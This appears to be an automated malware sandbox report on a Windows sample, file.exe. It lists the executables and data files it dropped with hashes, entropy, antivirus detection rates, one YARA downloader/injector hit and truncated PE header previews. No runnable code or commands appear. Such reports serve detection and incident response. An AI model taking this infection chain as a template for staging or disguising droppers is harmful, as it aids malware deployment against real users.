                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn..O<..Mn..O<i..n..v...Vn..Qn...n..O<n.}n..O<~.Pn..O<{.Pn..RichQn..................PE..L......a.....................6......fy............@.................................B...........................................P...............................D...P................................?..@............................................text............................... ..`.data...0........*..................@....rsrc............ ..................@..@.reloc...,..........................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):425
                                                                                    Entropy (8bit):5.340009400190196
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                                                    MD5:CC144808DBAF00E03294347EADC8E779
                                                                                    SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                                                    SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                                                    SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):984
                                                                                    Entropy (8bit):5.227423502376633
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                                                                    MD5:D9512E54D33D06E68E0C0D36726F7776
                                                                                    SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                                                                    SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                                                                    SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):254464
                                                                                    Entropy (8bit):7.32436195105757
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:LRvnO9N2bPgOyL/dnBYWZf354wHGXobm/JRO0LDl8ABIx8VM6Q3DTNJ3nJWPfo3:1vnptyLFBYkmXF/DHFJw8VM93DDEPfo
                                                                                    MD5:38E67B1288479162D6BC93EE31A90564
                                                                                    SHA1:3457AE59AC2FDCF4B2013B4245EBEBFD22841196
                                                                                    SHA-256:A2AE21D0E3746DD06AC2B1C69517DF60E3998D4D3DB47D655B1C01504BBA21AA
                                                                                    SHA-512:76B931CE148CC722412C454ADAD5A22FE295E6A879E6491658E274D06FA46557810EB34285CD48537D749E0F819E8D9134F903C132A55592006DE2F44505E72B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L......b............................_r............@........................................................................\...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):722944
                                                                                    Entropy (8bit):7.843693287624674
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:zUJFDhiQSO/bmqK1NIK6kxk7q4p/dn57k/x4omG1ZQHdt1AaQf8O:zQF0Qn6qQoTLdH76x1R1Z4AaQL
                                                                                    MD5:46909DA148DE57B2D85591626AEDBD76
                                                                                    SHA1:8000C3D7B0B33EAA538F8B0E09EFF0559AF06287
                                                                                    SHA-256:0CA1867B6E512A1E78D8A00CECF4FDC09B665B31F9AF122C78EE4A1E5DE5A692
                                                                                    SHA-512:C3A4C1392E9300C5A9255A8BEC4757D8244023F5353D693A9E7A1496DA92F1B90482F9201035AB07B669C228F8BEDBE467F5C54BFB8F4D50C90350B0F2076603
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn..O<..Mn..O<i..n..v...Vn..Qn...n..O<n.}n..O<~.Pn..O<{.Pn..RichQn..................PE..L......a.....................6......fy............@.................................B...........................................P...............................D...P................................?..@............................................text............................... ..`.data...0........*..................@....rsrc............ ..................@..@.reloc...,..........................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):387584
                                                                                    Entropy (8bit):6.881738348627874
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:x8DLMZy4voyHwQ+CADR/Qe/eEWajEcf4:CQDvfHwQgVQwVEcf
                                                                                    MD5:B141BC58618C537917CC1DA179CBE8AB
                                                                                    SHA1:C76D3F5EEAE9493E41A272A974B5DFEC5F4E4724
                                                                                    SHA-256:FD999E4A07D8B3D95F9D9231FD496B0125B56094F1B03DDCA7A7B074C1D8C03E
                                                                                    SHA-512:5C72F63124A394602A36A4F985E33A41E8159F54653F431C270B8F0FA8E13131517C31B497A936D5F5D3D27397F40FC7909EFC4BFD04C01BCCA7F306860C3114
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z...z...z...(j..z...({..z...(m..z......z...z...z...(d..z...(z..z...(...z..Rich.z..........PE..L...;..a.............................@............@..................................)..........................................<........a..........................................................h,..@...............l............................text............................... ..`.data...@...........................@....guno................N..............@..@.jofolo.F............R..............@..@.nabog...............l..............@..@.rsrc....a.......b...p..............@..@.reloc.."...........................@..B........................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3657728
                                                                                    Entropy (8bit):7.795668090342615
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:8gleOA+U9OYPQAY0YdNa1rcO7B9elk44MRTVkVu:tleOA+oDP20YdNa1IM90YMRTm
                                                                                    MD5:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    SHA1:01EFD55A04010EC4E7197BCAC7EC351BB8E5BF07
                                                                                    SHA-256:3F59D2CF23B45B7F56563E85BF818F827F2607D12661FB438BCF031550EC0EC0
                                                                                    SHA-512:CF0C87B4B5101898A48AB312CD1436E2738762EE74D1D77A29635053A373D5DFF237DA84A17DFE7897C7E99B919325FF8C47238A2FD06DFDB04F3D18F4A97185
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...?;.c..........#...................:........@..............................b........... ...................................................-.d.....a......^a............................................8.+.0...@]a.8............................................text...P........................... ..`.rdata..b...........................@..@.data..............................@....pdata...... ......................@..@_RDATA..............................@..@.vmp0... T..........................`..`.vmp1...t.7.. *...7.................`..h.rsrc.........a.......7.............@..@................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):7722496
                                                                                    Entropy (8bit):7.943852397063956
                                                                                    Encrypted:false
                                                                                    SSDEEP:196608:xmnP/F68J3FxrU93Eq3zPgSnbWOGGY7p:Y37RjqjPDbWhGY
                                                                                    MD5:B328ABE938AE81E9382BD6858A6EE77F
                                                                                    SHA1:EDBEBCBBEEDB642D906A5E96A1E76A1FB580A11C
                                                                                    SHA-256:CB354C4E272DE841E4A2CC6D96C88C291A720487637EFF8075F6725896137DED
                                                                                    SHA-512:5D9A58ACA575F68D872A7C9643207636CBE0E8B86644971C1E36DC1707A9694F5D5F2B32BD10565CB0EC27FB616A0D6B51EC5E602D86B3DCC538CCA80BE6E845
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\A33B.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..c..................u...........u.. ....v...@.. .......................@v...........@.................................H.u.S.....v...................... v...................................................... ............... ..H............text.....u.. ....u................. ..`.rsrc.........v.......u.............@..@.reloc....... v.......u.............@..B..................u.....H.........u.\............'....u..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):200192
                                                                                    Entropy (8bit):7.034764103148747
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:8gJO/TK0wdrrseL/iyoWo5s1412e1YqsVf0cnas1pbzeVCTAaGtR:8gJsmFdEeLfoW1412toQas1XAvtR
                                                                                    MD5:0CA939E14D58B13997144F0AF89ADEA9
                                                                                    SHA1:65DD44DDE830E9CBAB5149369A333D4F6464E86D
                                                                                    SHA-256:A2C60618D112DA73E9019312A77CD8CD78A4E924E128F21DC8410E012A510CD3
                                                                                    SHA-512:FD9C6B5A9CD78AAC50443B44DFC46F5F60F17D1F3D858B7B85097D66EA703BB8491B63EBBA3A2F2C3A7869FDFBB1BF9F8A3A763B015E0886DA0526BE59309DFB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............e...e...e.B....e.....e....e.......e...d.x.e.....e.....e......e.Rich..e.........................PE..L......b.....................>.......w............@.............................................................................P...............................4...@................................>..@............................................text...~........................... ..`.data............8..................@....rsrc............ ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):198656
                                                                                    Entropy (8bit):7.0336896297722555
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9SbOLZRNAmrLJhkdW75GZK926+oi75o0eEHSLVWE8:9Sbc5rLUd5Z76+J5xeEkVWE8
                                                                                    MD5:29C3DE14DFFA53EDC7E690D0FC0ECCE2
                                                                                    SHA1:B35F5F268762A950EB18741B4944DB7DB232DB00
                                                                                    SHA-256:81AF8254226542C9E5538369E4643DB192DB7BC31817BBCF0931AA897B11CA84
                                                                                    SHA-512:03E68667B3C8361860464F81E38A074E148A3A017405BA6D641901D0F1F887006DFEE326C8A7D868781C69DF162885FACB94223B2CCF656E88C1AAB62B4C456E
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L.....Vb.....................>......Or............@..................................l......................................L...P...................................@...............................p9..@............................................text............................... ..`.data............8..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):200192
                                                                                    Entropy (8bit):7.021128640275825
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:KGmOScBINJYW7LNxrWU5qJw5TN7Ow+CsfOaMqhpmx7OwSSZ+ER:KGmkIB7LTrwyd717OOrR
                                                                                    MD5:3A452937E8A961C5E19974C2CBB4AFAA
                                                                                    SHA1:6C8522AC545442F29B6A5A768FA9F0FC4A38A928
                                                                                    SHA-256:DE5F535B0A84C65BB341EE58B72BDA0B75C18CD795EFF21A5318D0BFDAEE21BD
                                                                                    SHA-512:C12172037F48F14394CD2D408DC2B31AD683C253B57EB807949F05E53AF95954BA8D10EBCBAD4B0562AB69D932F2D8463E4891350756170940054182A72D8252
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............e...e...e.B....e.....e....e.......e...d.x.e.....e.....e......e.Rich..e.........................PE..L.....~b.....................>.......w............@.................................o...........................................P...............................@...@................................>..@............................................text...~........................... ..`.data............8..................@....rsrc............ ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:modified
                                                                                    Size (bytes):3847168
                                                                                    Entropy (8bit):7.985609186180041
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:MSQ3/Y0ws5Zw/QJCZObVeCuMFWxrMKUs+mNXc:MSQPY/s5stsPDIoKUs+
                                                                                    MD5:7E01B1A967FADD92B78A52411556C945
                                                                                    SHA1:B8C9839599B8F721E05B68B2E9AFE81FB8FC5225
                                                                                    SHA-256:696682568C05C3EA48ABA981D359133B72457417C8C10C27A80BDF83CCEC7B61
                                                                                    SHA-512:BA4AC3BC16A6B71A4B7F564625C536AAC4C9F1C950B3D9604DFA6F61E37690B5A261857D007F85CCB059255CD837C29FFEB4410C5F87EB2F15839BEACA1AB47D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L....;.b......................K.....Or............@...........................O.....w.:.....................................L...P.... M......................0O.....@........................9......p9..@............................................text............................... ..`.data....}K.......8.................@....rsrc........ M.. ...H:.............@..@.reloc...J...0O..L...h:.............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3890176
                                                                                    Entropy (8bit):7.902408557753204
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:8Pu803iSM2N7aUjjqpEbUS2qv5MQBsSY/b7KoiTFUgxylC42lVJpiU71PP:s12BEE4vqxMQzub7OTFUgxylqTiU7J
                                                                                    MD5:3006B49F3A30A80BB85074C279ACC7DF
                                                                                    SHA1:728A7A867D13AD0034C29283939D94F0DF6C19DF
                                                                                    SHA-256:F283B4C0AD4A902E1CB64201742CA4C5118F275E7B911A7DAFDA1EF01B825280
                                                                                    SHA-512:E8FC5791892D7F08AF5A33462A11D39D29B5E86A62CBF135B12E71F2FCAAA48D40D5E3238F64E17A2F126BCFB9D70553A02D30DC60A89F1089B2C1E7465105DD
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Bu.c...............&.....X;................@..............................;.....!.;...`... ...............................................8.......9.......8...............;...............................8.(...................D.8..............................text...............................`..`.data.....7.......7.................@....rdata........8.......8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........9.......8.............@....rsrc.........9.......8.............@....reloc........;......Z;.............@..B........................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):571230
                                                                                    Entropy (8bit):7.964582338724255
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:FV1e0UgkVT6ZT+3JCnoxgLgoCXwbePLJrH8fwpL:FV1edgkV8T0CnoxZ4ePLJTMwpL
                                                                                    MD5:30D5F615722D12FDDA4F378048221909
                                                                                    SHA1:E94E3E3A6FAE8B29F0F80128761AD1B69304A7EB
                                                                                    SHA-256:B7CB464CD0C61026EC38D89C0A041393BC9369E217303677551EEC65A09D2628
                                                                                    SHA-512:A561A224D7228EC531A966C7DBD6BC88138E2F4A1C8112E5950644F69BF3A43B1E87E03BC1B4FD5E9CA071B5A9353B18697573404602CCD51F2946FAF95144C2
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:P,..Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                    Process:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):53248
                                                                                    Entropy (8bit):5.2806602069772195
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:XehpWSsdMRgTh4QPt0RaYaGCp9FclU2sSadM7yjR+Lcuczw0RoR/5rdy7olDJfUw:ipW6+grtlU2v7yGLwwouflpZ2tVtkTF
                                                                                    MD5:1B20E998D058E813DFC515867D31124F
                                                                                    SHA1:C9DC9C42A748AF18AE1A8C882B90A2B9E3313E6F
                                                                                    SHA-256:24A53033A2E89ACF65F6A5E60D35CB223585817032635E81BF31264EB7DABD00
                                                                                    SHA-512:79849FBDB9A9E7F7684B570D14662448B093B8AA2B23DFD95856DB3A78FAF75A95D95C51B8AA8506C4FBECFFEBCC57CD153DDA38C830C05B8CD38629FAE673C6
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R....................................7......................................Rich............................PE..L.....c...........!.....p...P......................................................>W.................................@...$...<...............................4...................................0...@............................................text....g.......p.................. ..`.rdata........... ..................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3657728
                                                                                    Entropy (8bit):7.795668090342615
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:8gleOA+U9OYPQAY0YdNa1rcO7B9elk44MRTVkVu:tleOA+oDP20YdNa1IM90YMRTm
                                                                                    MD5:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    SHA1:01EFD55A04010EC4E7197BCAC7EC351BB8E5BF07
                                                                                    SHA-256:3F59D2CF23B45B7F56563E85BF818F827F2607D12661FB438BCF031550EC0EC0
                                                                                    SHA-512:CF0C87B4B5101898A48AB312CD1436E2738762EE74D1D77A29635053A373D5DFF237DA84A17DFE7897C7E99B919325FF8C47238A2FD06DFDB04F3D18F4A97185
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...?;.c..........#...................:........@..............................b........... ...................................................-.d.....a......^a............................................8.+.0...@]a.8............................................text...P........................... ..`.rdata..b...........................@..@.data..............................@....pdata...... ......................@..@_RDATA..............................@..@.vmp0... T..........................`..`.vmp1...t.7.. *...7.................`..h.rsrc.........a.......7.............@..@................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\A33B.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):163840
                                                                                    Entropy (8bit):5.025420345934772
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:Dz6Gwy7E2OreQTFwf32MVnZbmQNLk7mtlqWGG9Lto8hecAD9Grp/2mPYHfMDy4If:ZyrRqf32MXb38mSzuhPAK/23kTktX6
                                                                                    MD5:B9363486500E209C05F97330226BBF8A
                                                                                    SHA1:BFE2D0072D09B30EC66DEE072DDE4E7AF26E4633
                                                                                    SHA-256:01138F2318E59E1FE59F1EB7DE3859AF815EBF9A59AAE1084C1A97A99319EE35
                                                                                    SHA-512:6D06E5BAEAB962D85B306C72F39A82E40E22EB889867C11C406A069011155CB8901BF021F48EFC98FD95340BE7E9609FC11F4E24FC322DBF721E610120771534
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 85%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../2N.N\..N\..N\...!..N\...1..N\.uA...N\...2..N\.uA...N\..N]..N\......N\...$..N\.Rich.N\.................PE..L.....c.............................)............@................................. ...........................................<....@...E..........................`...................................@............... ............................text............................... ..`.rdata...+.......0..................@..@.data...8"....... ..................@....rsrc....P...@...P...0..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):198656
                                                                                    Entropy (8bit):7.0336896297722555
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9SbOLZRNAmrLJhkdW75GZK926+oi75o0eEHSLVWE8:9Sbc5rLUd5Z76+J5xeEkVWE8
                                                                                    MD5:29C3DE14DFFA53EDC7E690D0FC0ECCE2
                                                                                    SHA1:B35F5F268762A950EB18741B4944DB7DB232DB00
                                                                                    SHA-256:81AF8254226542C9E5538369E4643DB192DB7BC31817BBCF0931AA897B11CA84
                                                                                    SHA-512:03E68667B3C8361860464F81E38A074E148A3A017405BA6D641901D0F1F887006DFEE326C8A7D868781C69DF162885FACB94223B2CCF656E88C1AAB62B4C456E
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L.....Vb.....................>......Or............@..................................l......................................L...P...................................@...............................p9..@............................................text............................... ..`.data............8..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):198144
                                                                                    Entropy (8bit):7.041743566438781
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:hlrXO4DHzvDSyUPLoigWo351k/Z2N/BbET2tOWIbq0ES4vy3DwHkEforb:/rXbT0PL1g5W2pZETbWIULvy3UHkEQ
                                                                                    MD5:17A74A0281CEFB5D9C29022FBC79981A
                                                                                    SHA1:D88585C6C9488B6D28B71DD0659EDB8649E32DCA
                                                                                    SHA-256:2814B2A02771E2D16CE2EFB1586D8623B54B50D6E1C8DFA9AB2BBF54AB8B249D
                                                                                    SHA-512:E53AE73584F2DE67589AB0354F4D7CF16053109E4AC458E962C17EE5DFBE65BFDCD05553574E839EBCF2925A130D75BC14994B908A2928F017776D43A7BFDD55
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 49%
                                                                                    Reputation:unknown
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L......b.....................<......_r............@.........................................................................\...P...................................@...............................p9..@............................................text............................... ..`.data............6..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.041743566438781
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:file.exe
                                                                                    File size:198144
                                                                                    MD5:17a74a0281cefb5d9c29022fbc79981a
